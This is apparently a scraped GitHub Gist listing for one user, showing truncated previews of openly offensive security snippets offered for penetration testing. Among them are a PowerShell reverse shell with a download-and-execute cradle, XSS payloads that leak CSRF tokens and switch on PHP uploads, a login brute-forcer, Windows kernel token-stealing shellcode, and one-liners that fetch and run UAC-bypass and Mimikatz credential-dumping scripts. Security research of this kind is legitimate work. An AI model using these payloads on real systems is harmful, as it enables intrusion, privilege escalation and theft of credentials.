Oussama amriunix
amriunix
/ .bashrc.b64
Created
April 2, 2023 15:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| IyB+Ly5iYXNocmM6IGV4ZWN1dGVkIGJ5IGJhc2goMSkgZm9yIG5vbi1sb2dpbiBzaGVsbHMuCiMgc2VlIC91c3Ivc2hhcmUvZG9jL2Jhc2gvZXhhbXBsZXMvc3RhcnR1cC1maWxlcyAoaW4gdGhlIHBhY2thZ2UgYmFzaC1kb2MpCiMgZm9yIGV4YW1wbGVzCgojIElmIG5vdCBydW5uaW5nIGludGVyYWN0aXZlbHksIGRvbid0IGRvIGFueXRoaW5nCmNhc2UgJC0gaW4KICAgICppKikgOzsKICAgICAgKikgcmV0dXJuOzsKZXNhYwoKIyBkb24ndCBwdXQgZHVwbGljYXRlIGxpbmVzIG9yIGxpbmVzIHN0YXJ0aW5nIHdpdGggc3BhY2UgaW4gdGhlIGhpc3RvcnkuCiMgU2VlIGJhc2goMSkgZm9yIG1vcmUgb3B0aW9ucwpISVNUQ09OVFJPTD1pZ25vcmVib3RoCgojIGFwcGVuZCB0byB0aGUgaGlzdG9yeSBmaWxlLCBkb24ndCBvdmVyd3JpdGUgaXQKc2hvcHQgLXMgaGlzdGFwcGVuZAoKIyBmb3Igc2V0dGluZyBoaXN0b3J5IGxlbmd0aCBzZWUgSElTVFNJWkUgYW5kIEhJU1RGSUxFU0laRSBpbiBiYXNoKDEpCkhJU1RTSVpFPTEwMDAKSElTVEZJTEVTSVpFPTIwMDAKCiMgY2hlY2sgdGhlIHdpbmRvdyBzaXplIGFmdGVyIGVhY2ggY29tbWFuZCBhbmQsIGlmIG5lY2Vzc2FyeSwKIyB1cGRhdGUgdGhlIHZhbHVlcyBvZiBMSU5FUyBhbmQgQ09MVU1OUy4Kc2hvcHQgLXMgY2hlY2t3aW5zaXplCgojIElmIHNldCwgdGhlIHBhdHRlcm4gIioqIiB1c2VkIGluIGEgcGF0aG5hbWUgZXhwYW5zaW9uIGNvbnRleHQgd2lsbAojIG1hdGNoIGFsbCBmaWxlcyBhbmQgemVybyBv |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Invoke-Go: REV-PSH | |
| # powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://<URL>/Invoke-Go.ps1');Invoke-Go -Back -IPAddress 192.168.216.129 -Port 443" | |
| function Invoke-Go | |
| { | |
| [CmdletBinding(DefaultParameterSetName="back")] Param( | |
| [Parameter(Position = 0, Mandatory = $true, ParameterSetName="back")] | |
| [Parameter(Position = 0, Mandatory = $false, ParameterSetName="onit")] | |
| [String] | |
| $IPAddress, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import zipfile | |
| from cStringIO import StringIO | |
| def _build_zip(): | |
| f = StringIO() | |
| z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) | |
| z.writestr('folder/file.txt', 'This is just a text file!') | |
| z.writestr('code.php', '<?php phpinfo(); ?>') |
amriunix
/ SimpleHTTPServer-CORS.py
Created
March 29, 2020 15:12
Python3 HTTP Server to enable CORS (Cross-Origin Resource Sharing)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from http.server import HTTPServer, SimpleHTTPRequestHandler, test | |
| import sys | |
| class CORSRequestHandler (SimpleHTTPRequestHandler): | |
| def end_headers (self): | |
| self.send_header('Access-Control-Allow-Origin', '*') | |
| SimpleHTTPRequestHandler.end_headers(self) | |
| if __name__ == '__main__': |
amriunix
/ Advanced-XSS.js
Last active
July 14, 2023 09:41
Some XSS payload for File Upload, leaking CSRF tokens, updating data and triggering files
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function updateConfig(csrf) { | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('POST', '/application/vulnerable/to/fileUpload/settings', true); | |
| xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); | |
| xhr.withCredentials = true; | |
| configPayload = 'save=1&user=admin&allowFileUpload=php&csrf=' + csrf; | |
| xhr.send(configPayload); | |
| } | |
| function getCSRF() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from flask import Flask, request | |
| import requests | |
| import base64 | |
| requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) | |
| URL = 'http://Victim.com/vuln.php' | |
| Host = 'Victim.com' |
amriunix
/ intruder.py
Last active
March 24, 2020 10:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import threading | |
| import time | |
| import requests | |
| requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) | |
| URL = 'http://192.168.25.130:9090/login.php' | |
| Host = 'atutor' | |
| Users = ['Guest','Admin','Test'] |
amriunix
/ TokenStealer.nasm
Last active
February 7, 2020 10:49
Windows Kernel Shellcode : TokenStealer - https://amriunix.com/post/windows-kernel-shellcode-tokenstealer/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [bits 64] | |
| global _start | |
| section .text | |
| _start: | |
| mov r9, qword [gs:0x188] ; Pointing at _KTHREAD structure | |
| mov r9, qword [r9 + 0x220] ; Pointing at _KPROCESS/_EPROCESS structure | |
| mov r8, qword [r9 + 0x3e8] ; Saving the Parent PID in r8 / you can change it directly with a PID value from your choice ! | |
| mov rax, r9 ; Saving the _KPROCESS/_EPROCESS address |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>Upload your files</title> | |
| </head> | |
| <body> | |
| <form enctype="multipart/form-data" action="upload.php" method="POST"> | |
| <p>Upload your file</p> | |
| <input type="file" name="file"></input><br /> | |
| <input type="submit" value="Upload"></input> |
NewerOlder